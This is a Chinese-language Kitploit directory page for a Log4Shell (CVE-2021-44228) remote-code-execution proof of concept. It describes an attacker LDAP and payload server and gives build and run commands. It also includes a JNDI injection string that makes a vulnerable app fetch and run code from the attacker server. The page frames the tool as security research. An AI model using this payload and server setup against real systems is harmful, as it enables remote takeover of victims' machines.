Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2021-44228-rce-poc — Log4Shell (CVE-2021-44228) 的远程代码执行 PoC | Kitploit
工具/GitHubGitHub/ubitech/cve-2021-44228-rce-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHububitech/cve-2021-44228-rce-poc

cve-2021-44228-rce-poc

Log4Shell (CVE-2021-44228) 的远程代码执行 PoC

查看仓库
3224年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-44228 远程命令执行 PoC

该仓库允许安全研究人员通过提供一个攻击服务器的实现来试验远程代码执行,该攻击服务器会在包含 log4j 的易受攻击应用程序上加载自定义漏洞利用。

⚠️ 该工具仅用于自我评估,且只能由授权人员或研究人员使用。 你只应测试你拥有明确许可或权限的系统。如果你发现易受攻击的应用程序或库,你应遵循负责任地披露。

RCE 步骤

CVE-2021-44228 的工作原理是向日志中注入 JNDI LDAP 字符串,这会触发 Log4j 联系指定的 LDAP 服务器以查找更多信息。在恶意场景中,LDAP 服务器随后可向受害机器提供代码,该代码将在内存中自动执行。

该仓库包含两个子项目。attacker-server 项目包含两个线程服务器的源代码。第一个是一个 LDAP 代理,接收对 LDAP 对象的初始请求。第二个服务器是 payload 服务器,将漏洞利用(存在于 Exploit.java 中)返回给易受攻击的应用程序。

构建

在项目根目录下:

root@kitploit:~
mvn clean install

服务器和易受攻击的应用程序都应准备就绪。

执行 PoC

为了加载服务器,执行:

root@kitploit:~
java -jar attacker-server/target/attacker-server-0.0.1-SNAPSHOT-jar-with-dependencies.jar

为了触发 RCE,执行

root@kitploit:~
java -jar vulnapp/target/vulnapp-0.0.1-SNAPSHOT-jar-with-dependencies.jar \${jndi:ldap://127.0.0.1:1389/Exploit}

你可以通过扩展 Exploit.java 根据需要更改恶意 payload。

下载工具